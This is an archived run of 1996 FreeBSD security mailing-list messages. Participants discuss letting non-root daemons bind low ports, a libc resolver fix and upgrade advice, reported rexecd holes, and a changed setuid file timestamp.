> I think it's acceptable wtih 1024 lines. Really... If all ports default > to root only, how many lines would you have? Do you use all ports < 1024? > And of many of those things run under inetd , which has to run as root > anyway. You will probably never use more then a few lines. The problem is that the output of a sysctl -a will be very bloated. If you could make the variable only appear when changed from the default it would be a different matter, but I don't think that is practical. The way current sysctl variables are done, it also means several thousand more lines of source, since each option needs a seperate define, etc. It would also add somewhere between 2k and 40k to the compiled kernel if implemented the dumb way; I think that is a significant amount for something with such limited use. It could easily be hidden behind an ifdef I guess. Oh, and one other thing I missed is that it should be under net.inet.ip (perhaps; it doesn't quite fit in at that level though) and not tcp because it applies to both tcp and udp. > > > On Mon, 18 Nov 1996, Poul-Henning Kamp wrote: > [...] > > > sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp` > > > sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp` > > > sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp` > > > sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp` > [...] > > Just my $0.02 > /Mikael > From owner-freebsd-security Tue Nov 19 23:42:49 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA11537 for security-outgoing; Tue, 19 Nov 1996 23:42:49 -0800 (PST) Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA11531 for ; Tue, 19 Nov 1996 23:42:46 -0800 (PST) Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id XAA25718; Tue, 19 Nov 1996 23:42:47 -0800 (PST) Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id SAA04136; Wed, 20 Nov 1996 18:42:26 +1100 From: Julian Assange Message-Id: <199611200742.SAA04136@suburbia.net> Subject: Re: binding to ports < 1024 (was: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).) To: marcs@znep.com (Marc Slemko) Date: Wed, 20 Nov 1996 18:42:25 +1100 (EST) Cc: freebsd-security@freebsd.org In-Reply-To: from "Marc Slemko" at Nov 19, 96 07:11:50 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > The problem is that the output of a sysctl -a will be very bloated. If > you could make the variable only appear when changed from the default it > would be a different matter, but I don't think that is practical. The way > current sysctl variables are done, it also means several thousand more > lines of source, since each option needs a seperate define, etc. It would > also add somewhere between 2k and 40k to the compiled kernel if > implemented the dumb way; I think that is a significant amount for > something with such limited use. It could easily be hidden behind an > ifdef I guess. This can performed as a linked list of affected ranges. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff@suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff@gnu.ai.mit.edu | FAX +61-3-98199066 | C7F81C2AA32D7D4E4D360A2ED2098E0D | +---------------------+--------------------+----------------------------------+ From owner-freebsd-security Wed Nov 20 01:13:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA17520 for security-outgoing; Wed, 20 Nov 1996 01:13:36 -0800 (PST) Received: from panoramix.rain.fr (panoramix.rain.fr [194.51.3.136]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA17513; Wed, 20 Nov 1996 01:13:29 -0800 (PST) Received: from panoramix.rain.fr (localhost [127.0.0.1]) by panoramix.rain.fr (8.8.3/8.8.3) with SMTP id KAA25586; Wed, 20 Nov 1996 10:19:40 +0100 (MET) Message-ID: <3292CD2C.41C67EA6@panoramix.rain.fr> Date: Wed, 20 Nov 1996 09:19:40 +0000 From: Tom Fischer X-Mailer: Mozilla 3.01 (X11; I; FreeBSD 2.1.0-RELEASE i386) MIME-Version: 1.0 To: FreeBSD Security Officer CC: freebsd-security@freebsd.org Subject: Re: Serious BIND resolver problem. (fwd) References: <7ypw19iosu.fsf@base.jnx.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hello, "quietly fixed?" I'm not too sure I like the sound of that. I'm running 2.1.0-Release, installed off the January 1996 cdrom on several systems. I'm installed all of the patches, etc., that were available on ftp://freebsd.org/pub/CERT/patches, and I don't remember anything about this problem (apparently, obviously). My question is: Do I need to do something to my libc library? As I understand it, 2.1R from the cd is not the same thing as 2.1 -stable... or am I wrong? thanks, tom tfischer@rain.fr ===================================================== FreeBSD Security Officer wrote: > > The SNI advisory is for a problem that had been corrected quite some time ago. > This is a "late" advisory causing lots of folks confusion. > > The problem is in the resolver libraries (in libc). Upgrading named to 4.9.5 > will not fix this problem. This problem was quietly fixed in 2.1 -stable and > -current releases by explicit request of the author several months ago. > > Paul From owner-freebsd-security Wed Nov 20 09:51:38 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA21662 for security-outgoing; Wed, 20 Nov 1996 09:51:38 -0800 (PST) Received: from precipice.shockwave.com (ppp-206-170-5-61.rdcy01.pacbell.net [206.170.5.61]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA21647; Wed, 20 Nov 1996 09:51:29 -0800 (PST) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.8.2/8.7.3) with ESMTP id JAA20913; Wed, 20 Nov 1996 09:50:09 -0800 (PST) Message-Id: <199611201750.JAA20913@precipice.shockwave.com> To: Tom Fischer cc: FreeBSD Security Officer , freebsd-security@freebsd.org Subject: Re: Serious BIND resolver problem. (fwd) In-reply-to: Your message of "Wed, 20 Nov 1996 09:19:40 GMT." <3292CD2C.41C67EA6@panoramix.rain.fr> Date: Wed, 20 Nov 1996 09:50:09 -0800 From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk From: Tom Fischer Subject: Re: Serious BIND resolver problem. (fwd) Hello, "quietly fixed?" I'm not too sure I like the sound of that. I'm running 2.1.0-Release, installed off the January 1996 cdrom on several systems. I'm installed all of the patches, etc., that were available on ftp://freebsd.org/pub/CERT/patches, and I don't remember anything about this problem (apparently, obviously). We normally do full disclosure on security bug reports, this was an exception. My question is: Do I need to do something to my libc library? Yes. As I understand it, 2.1R from the cd is not the same thing as 2.1 -stable... or am I wrong? If you're running 2.1R, you've got so many bloody security holes it's not funny. If you allow "untrusted" users on your machine, my advice is to upgrade to 2.1.6 or 2.1-stable (nearly the same thing) without delay. From owner-freebsd-security Wed Nov 20 10:10:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA23621 for security-outgoing; Wed, 20 Nov 1996 10:10:06 -0800 (PST) Received: from panoramix.rain.fr (panoramix.rain.fr [194.51.3.136]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA23608 for ; Wed, 20 Nov 1996 10:10:01 -0800 (PST) Received: from panoramix.rain.fr (localhost [127.0.0.1]) by panoramix.rain.fr (8.8.3/8.8.3) with SMTP id TAA15656; Wed, 20 Nov 1996 19:15:56 +0100 (MET) Message-ID: <32934ADB.15FB7483@panoramix.rain.fr> Date: Wed, 20 Nov 1996 18:15:55 +0000 From: Tom Fischer X-Mailer: Mozilla 3.01 (X11; I; FreeBSD 2.1.0-RELEASE i386) MIME-Version: 1.0 To: Paul Traina CC: freebsd-security@freebsd.org Subject: Re: Serious BIND resolver problem. (fwd) References: <199611201750.JAA20913@precipice.shockwave.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hello, Paul Traina warned: > If you're running 2.1R, you've got so many bloody security holes it's > not funny. If you allow "untrusted" users on your machine, my advice > is to upgrade to 2.1.6 or 2.1-stable (nearly the same thing) without delay. thanks for the advice, but I was hoping to delay this until 2.2R came out (in two months, supposedly). The security holes that I know about, and did something about are: mount_union, mount_msdos, man... suidperl iijppp rdist... Aside from this new libc thing, you're telling me that there are others as well? Is there an easy way to fix the libc problem while I wait for 2.2R? thanks, tom tfischer@rain.fr From owner-freebsd-security Wed Nov 20 10:23:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA24423 for security-outgoing; Wed, 20 Nov 1996 10:23:03 -0800 (PST) Received: from precipice.shockwave.com (ppp-206-170-5-61.rdcy01.pacbell.net [206.170.5.61]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA24415 for ; Wed, 20 Nov 1996 10:23:00 -0800 (PST) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.8.2/8.7.3) with ESMTP id KAA21077; Wed, 20 Nov 1996 10:22:03 -0800 (PST) Message-Id: <199611201822.KAA21077@precipice.shockwave.com> To: Tom Fischer cc: freebsd-security@freebsd.org Subject: Re: Serious BIND resolver problem. (fwd) In-reply-to: Your message of "Wed, 20 Nov 1996 18:15:55 GMT." <32934ADB.15FB7483@panoramix.rain.fr> Date: Wed, 20 Nov 1996 10:22:03 -0800 From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk From: Tom Fischer Subject: Re: Serious BIND resolver problem. (fwd) Hello, Paul Traina warned: > If you're running 2.1R, you've got so many bloody security holes it's > not funny. If you allow "untrusted" users on your machine, my advice > is to upgrade to 2.1.6 or 2.1-stable (nearly the same thing) without delay. thanks for the advice, but I was hoping to delay this until 2.2R came out (in two months, supposedly). The security holes that I know about, and did something about are: mount_union, mount_msdos, man... suidperl iijppp rdist... Aside from this new libc thing, you're telling me that there are others as well? Is there an easy way to fix the libc problem while I wait for 2.2R? Upgrade to 2.1.6's libc. thanks, tom tfischer@rain.fr From owner-freebsd-security Wed Nov 20 18:40:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA28705 for security-outgoing; Wed, 20 Nov 1996 18:40:41 -0800 (PST) Received: from mail.crl.com (mail.crl.com [165.113.1.22]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id SAA28681 for ; Wed, 20 Nov 1996 18:40:37 -0800 (PST) Received: from rover.village.org by mail.crl.com with SMTP id AA28327 (5.65c/IDA-1.5 for ); Wed, 20 Nov 1996 15:58:20 -0800 Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vQMSw-00032Z-00; Wed, 20 Nov 1996 16:54:02 -0700 To: Tom Fischer Subject: Re: Serious BIND resolver problem. (fwd) Cc: Paul Traina , freebsd-security@freebsd.org In-Reply-To: Your message of "Wed, 20 Nov 1996 18:15:55 GMT." <32934ADB.15FB7483@panoramix.rain.fr> References: <32934ADB.15FB7483@panoramix.rain.fr> <199611201750.JAA20913@precipice.shockwave.com> Date: Wed, 20 Nov 1996 16:54:02 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <32934ADB.15FB7483@panoramix.rain.fr> Tom Fischer writes: : Aside from this new libc thing, you're telling me that there are : others as well? Is there an easy way to fix the libc problem : while I wait for 2.2R? There are several lpr/lpd overflow problems that have been fixed as well. Warner From owner-freebsd-security Thu Nov 21 03:14:12 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA18181 for security-outgoing; Thu, 21 Nov 1996 03:14:12 -0800 (PST) Received: from al.imforei.apana.org.au (al.imforei.apana.org.au [202.12.89.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA18134 for ; Thu, 21 Nov 1996 03:13:14 -0800 (PST) Received: (from pjchilds@localhost) by al.imforei.apana.org.au (beBop) id VAA27330; Thu, 21 Nov 1996 21:42:22 +1030 (CST) Date: Thu, 21 Nov 1996 21:42:22 +1030 (CST) From: Peter Childs Message-Id: <199611211112.VAA27330@al.imforei.apana.org.au> To: newton@communica.com.au (Mark Newton), freebsd-security@freebsd.org Cc: miff@spam.frisbee.net.au Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). X-Newsreader: TIN [UNIX 1.3 unoff BETA release 961020] Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In article <9611180435.AA17191@communica.com.au> you wrote: : Michael Smith wrote: : : > Mark's sense of warmth is perhaps slightly over-smug, : Have you ever known me to be any different? :-) : > but his point is : > valid. In fact, if it were possible to be non-root and bind to port 25, : That's a wonderful point: The only reason sendmail needs root to bind to : port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP : ports less than 1024 can only be allocated by a privileged user. TCP/IP : implementations on non-UNIX platforms disagree violently with this : assumption, which makes the value of this "security" feature rather dubious. : It would be foolish of me to argue to have it changed, though :-) I'm just doing a little bit of poking and from what i can see all calls to bindresvport() go through bind() to the bind syscall. The bind syscall ends up in in_pcbbind (note pg 444 and 462 4.4BSD daemon book) and this bit does the check and returns EACCES on IPPORT_RESERVED && uid == root. Could an additional check in here just be used to check that if port requested is 25 and uid == mailmanager's uid then OK it? Am I missing something, or is this fairly trivial. It "seems" pretty hackish to do it in the kernel but as a "quick fix" would this do the job? Regards, Peter -- Peter Childs --- http://www.imforei.apana.org.au/~pjchilds Finger pjchilds@al.imforei.apana.org.au for public PGP key Drag me, drop me, treat me like an object! From owner-freebsd-security Thu Nov 21 04:25:15 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA21088 for security-outgoing; Thu, 21 Nov 1996 04:25:15 -0800 (PST) Received: from lovely.spam.frisbee.net.au (lovely.spam.frisbee.net.au [202.0.75.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id EAA21064 for ; Thu, 21 Nov 1996 04:25:09 -0800 (PST) Received: from lovely.spam.frisbee.net.au (localhost [127.0.0.1]) by lovely.spam.frisbee.net.au (8.8.2/8.6.12) with SMTP id XAA03688; Thu, 21 Nov 1996 23:01:29 +1030 (CST) Message-ID: <32944B9F.41C67EA6@spam.frisbee.net.au> Date: Thu, 21 Nov 1996 23:01:27 +1030 From: michael smith X-Mailer: Mozilla 3.01 (X11; I; FreeBSD 3.0-CURRENT i386) MIME-Version: 1.0 To: Peter Childs CC: Mark Newton , freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). References: <199611211112.VAA27330@al.imforei.apana.org.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Peter Childs wrote: > > I'm just doing a little bit of poking and from what i can see all > calls to bindresvport() go through bind() to the bind syscall. The > bind syscall ends up in in_pcbbind (note pg 444 and 462 4.4BSD daemon > book) and this bit does the check and returns EACCES on > IPPORT_RESERVED && uid == root. > > Could an additional check in here just be used to check that if port > requested is 25 and uid == mailmanager's uid then OK it? That's basically just hardcoding the more generic ideas bandied around earlier. The long-term solution is the "registry" concept, which is not really ready for showtime in any of the models that have been discussed. > Am I missing something, or is this fairly trivial. It "seems" pretty > hackish to do it in the kernel but as a "quick fix" would this do the > job? You wouldn't get it into the main tree, but as a local modification it'd most likely be effective. > Peter Childs --- http://www.imforei.apana.org.au/~pjchilds -- Mike Smith *BSD hack Unix hardware collector The question "why are the fundamental laws of nature mathematical" invites the trivial response "because we define as fundamental those laws which are mathematical". Paul Davies, _The_Mind_of_God_ From owner-freebsd-security Thu Nov 21 15:59:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA27654 for security-outgoing; Thu, 21 Nov 1996 15:59:47 -0800 (PST) Received: from offensive.communica.com.au (offensive-eth1.adl.communica.com.au [192.82.222.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA27633 for ; Thu, 21 Nov 1996 15:59:42 -0800 (PST) Received: from communica.com.au (frenzy.communica.com.au [192.82.222.65]) by offensive.communica.com.au (8.7.6/8.7.3) with SMTP id KAA12421; Fri, 22 Nov 1996 10:27:39 +1030 (CST) Received: by communica.com.au (4.1/SMI-4.1) id AA14971; Fri, 22 Nov 96 10:27:20 CDT From: newton@communica.com.au (Mark Newton) Message-Id: <9611212357.AA14971@communica.com.au> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: pjchilds@imforei.apana.org.au (Peter Childs) Date: Fri, 22 Nov 1996 10:27:20 +1030 (CST) Cc: newton@communica.com.au, freebsd-security@freebsd.org, miff@spam.frisbee.net.au In-Reply-To: <199611211112.VAA27330@al.imforei.apana.org.au> from "Peter Childs" at Nov 21, 96 09:42:22 pm X-Mailer: ELM [version 2.4 PL21] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 8bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Peter Childs wrote: > Could an additional check in here just be used to check that if port > requested is 25 and uid == mailmanager's uid then OK it? Only if everyone wanted to roll their own patch: There is no mail manager uid on FreeBSD in the standard installation, and there's no reason to think that everyone who added one would use the same id. That's certainly the right place to put any additional security mechanisms, but I think we need one a bit more generic than that. I like the sysctl idea, but it'd make sysctl -a unwieldy. There is another way, though: Consider nfs serving -- mountd reads /etc/exports, parses its contents, fills in the relevent fields of a data structure which describes which filesystems are to be exported, and pushes that data structure into the kernel via a system call. Why not employ a similar mechanism to read a config file which describes which users can bind to which ports and syscalls it into the kernel to fulfil a task similar to what the sysctl idea was attempting to acheive but without the elephantine MIB? Just an idea... - mark --- Mark Newton Email: newton@communica.com.au Systems Engineer Phone: +61-8-8373-2523 Communica Systems WWW: http://www.communica.com.au From owner-freebsd-security Thu Nov 21 18:48:05 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA07784 for security-outgoing; Thu, 21 Nov 1996 18:48:05 -0800 (PST) Received: from sunfire.ucs.net (root@sunfire.ucs.net [199.224.7.165]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA07744 for ; Thu, 21 Nov 1996 18:47:56 -0800 (PST) Received: from localhost (afurman@localhost) by sunfire.ucs.net (8.8.3/8.6.12) with SMTP id VAA17686 for ; Thu, 21 Nov 1996 21:43:47 -0500 (EST) Date: Thu, 21 Nov 1996 21:43:47 -0500 (EST) From: Adam Furman To: FREEBSD-SECURITY@freebsd.org Subject: Change DES to MD5 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I would like to know how I can change from DES passwords over to MD5. I running FreeBSD 2.20 snap 080196. Please tell me how I can do this. Thanks Adam Adam Furman System Administrator of Sunfire.ucs.net afurman@amf.net Irc HUB Admin of irc.ucs.net Mud Admin of sunfire.ucs.net:4000 From owner-freebsd-security Fri Nov 22 01:48:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA09403 for security-outgoing; Fri, 22 Nov 1996 01:48:43 -0800 (PST) Received: from precipice.shockwave.com (ppp-206-170-5-88.rdcy01.pacbell.net [206.170.5.88]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA09391; Fri, 22 Nov 1996 01:48:29 -0800 (PST) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.8.3/8.7.3) with ESMTP id BAA05167; Fri, 22 Nov 1996 01:47:27 -0800 (PST) Message-Id: <199611220947.BAA05167@precipice.shockwave.com> To: cschuber@uumail.gov.bc.ca cc: security-officer@freebsd.org, freebsd-security@freebsd.org Subject: Re: Futile rexecd holes In-reply-to: Your message of "Tue, 19 Nov 1996 07:53:27 PST." <199611191553.HAA00979@cwsys.cwent.com> Date: Fri, 22 Nov 1996 01:47:27 -0800 From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk After some careful analysis of the rexec/rshd "holes" mentioned in the message, I'm convinced there are no security holes that actually need fixing. Both exploits, even with tcp spoofing, give you nothing more than spoofing directly would do. Thanks for the notice though, Paul From owner-freebsd-security Fri Nov 22 14:23:08 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA21734 for security-outgoing; Fri, 22 Nov 1996 14:23:08 -0800 (PST) Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA21696; Fri, 22 Nov 1996 14:22:13 -0800 (PST) Received: from suburbia.net (suburbia.net [198.142.2.24]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id OAA01872; Fri, 22 Nov 1996 14:22:11 -0800 (PST) Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id IAA13622; Sat, 23 Nov 1996 08:53:49 +1100 From: Julian Assange Message-Id: <199611222153.IAA13622@suburbia.net> Subject: Re: Futile rexecd holes To: pst@shockwave.com (Paul Traina) Date: Sat, 23 Nov 1996 08:53:48 +1100 (EST) Cc: cschuber@uumail.gov.bc.ca, security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <199611220947.BAA05167@precipice.shockwave.com> from "Paul Traina" at Nov 22, 96 01:47:27 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > After some careful analysis of the rexec/rshd "holes" mentioned in the > message, I'm convinced there are no security holes that actually need > fixing. > > Both exploits, even with tcp spoofing, give you nothing more than spoofing > directly would do. > > Thanks for the notice though, > > Paul Except you do not need root. It exploits the trust model, where it could not be exploited before. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff@suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff@gnu.ai.mit.edu | FAX +61-3-98199066 | C7F81C2AA32D7D4E4D360A2ED2098E0D | +---------------------+--------------------+----------------------------------+ From owner-freebsd-security Fri Nov 22 22:57:49 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id WAA12694 for security-outgoing; Fri, 22 Nov 1996 22:57:49 -0800 (PST) Received: from odin.egate.net (odin.egate.net [207.34.206.2]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id WAA12689 for ; Fri, 22 Nov 1996 22:57:45 -0800 (PST) Received: (from root@localhost) by odin.egate.net (8.6.12/8.6.12) id BAA07199; Sat, 23 Nov 1996 01:53:59 -0500 Date: Sat, 23 Nov 1996 01:53:59 -0500 (EST) From: Operator ROOT To: freebsd-security@freebsd.org Subject: setuid diff in date/time.. Worry? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I was looking through my daily run and noticed that the date and time on a file had changed. It appears to be identical and I cannot think what would have caused the date to change.. Should I worry? Paul ---------- Forwarded message ---------- Date: Fri, 22 Nov 1996 02:00:26 -0500 checking setuid files and devices: odin setuid/device diffs: 71c71 < -r-sr-xr-x 1 uucp bin 196608 May 5 15:43:04 1996 /usr/libexec/uucp/uucico --- > -r-sr-xr-x 1 uucp bin 196608 Nov 21 19:15:51 1996 /usr/libexec/uucp/uucico checking for uids of 0: root 0 toor 0 From owner-freebsd-security Sat Nov 23 04:57:31 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA23588 for security-outgoing; Sat, 23 Nov 1996 04:57:31 -0800 (PST) Received: from arrakis.cs.put.poznan.pl (root@arrakis.cs.put.poznan.pl [150.254.33.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id EAA23581 for ; Sat, 23 Nov 1996 04:57:24 -0800 (PST) Received: (from piesik@localhost) by arrakis.cs.put.poznan.pl (8.7.5/8.7.3) id NAA18155; Sat, 23 Nov 1996 13:57:10 +0100 (MET) Date: Sat, 23 Nov 1996 13:57:10 +0100 (MET) From: Piotr Piesik Message-Id: <199611231257.NAA18155@arrakis.cs.put.poznan.pl> To: freebsd-security@FreeBSD.org, root@odin.egate.net Subject: Re: setuid diff in date/time.. Worry? Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > I was looking through my daily run and noticed that the date and time on > a file had changed. It appears to be identical and I cannot think what > would have caused the date to change.. Should I worry? I have the same problem on my 2.1.0-R :-( But md5 checksums are ok.. Piotr --------------------------------------------------------------- Piotr Piesik, NetWare & Unix system administrator Institute of Computing Science, Poznan University of Technology --------------------------------------------------------------- From owner-freebsd-security Sat Nov 23 05:49:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA27083 for security-outgoing; Sat, 23 Nov 1996 05:49:43 -0800 (PST) Received: from shadow.apana.org.au (bradf@shadow.apana.org.au [202.12.88.82]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id FAA27068 for ; Sat, 23 Nov 1996 05:49:34 -0800 (PST) Received: (from bradf@localhost) by shadow.apana.org.au (8.6.12/8.6.9) id AAA03723; Sun, 24 Nov 1996 00:48:44 +1100 Date: Sun, 24 Nov 1996 00:48:44 +1100 (EST) From: bradf To: Piotr Piesik cc: freebsd-security@FreeBSD.ORG, root@odin.egate.net Subject: Re: setuid diff in date/time.. Worry? In-Reply-To: <199611231257.NAA18155@arrakis.cs.put.poznan.pl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Could you please have this addres removed from you mailing list, this account has been used to hack into commerical systems in sdyney, this information , should not have been sent to this user. This is the admin of Shadow Apana Internet Services. +--------------------------------------------------------+ | Brad Forschinger - bradf@shadow.apana.org.au | | dole bludging, tafe attending, good-for-nuttin | +--------------------------------------------------------+ On Sat, 23 Nov 1996, Piotr Piesik wrote: > > I was looking through my daily run and noticed that the date and time on > > a file had changed. It appears to be identical and I cannot think what > > would have caused the date to change.. Should I worry? > > I have the same problem on my 2.1.0-R :-( > But md5 checksums are ok.. > > Piotr > > --------------------------------------------------------------- > Piotr Piesik, NetWare & Unix system administrator > Institute of Computing Science, Poznan University of Technology > --------------------------------------------------------------- > From owner-freebsd-security Sat Nov 23 09:31:21 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA03636 for security-outgoing; Sat, 23 Nov 1996 09:31:21 -0800 (PST) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA03628 for ; Sat, 23 Nov 1996 09:31:18 -0800 (PST) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id SAA18132 for ; Sat, 23 Nov 1996 18:31:14 +0100 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id SAA02567 for freebsd-security@freebsd.org; Sat, 23 Nov 1996 18:30:46 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id QAA25241; Sat, 23 Nov 1996 16:17:03 +0100 (MET) Message-ID: Date: Sat, 23 Nov 1996 16:17:02 +0100 From: roberto@keltia.freenix.fr (Ollivier Robert) To: freebsd-security@freebsd.org Subject: Re: setuid diff in date/time.. Worry? References: X-Mailer: Mutt 0.51 Mime-Version: 1.0 X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686 In-Reply-To: ; from Operator ROOT on Nov 23, 1996 01:53:59 -0500 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk According to Operator ROOT: > I was looking through my daily run and noticed that the date and time on > a file had changed. It appears to be identical and I cannot think what > would have caused the date to change.. Should I worry? I don't think so, especially if the MD5 checksum doesn't change. There was a bug in the VM of 2.1.0 that would cause the kernel to update the date even if the page was not written. You may want to reinstall the binary from the live file system CD though. -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996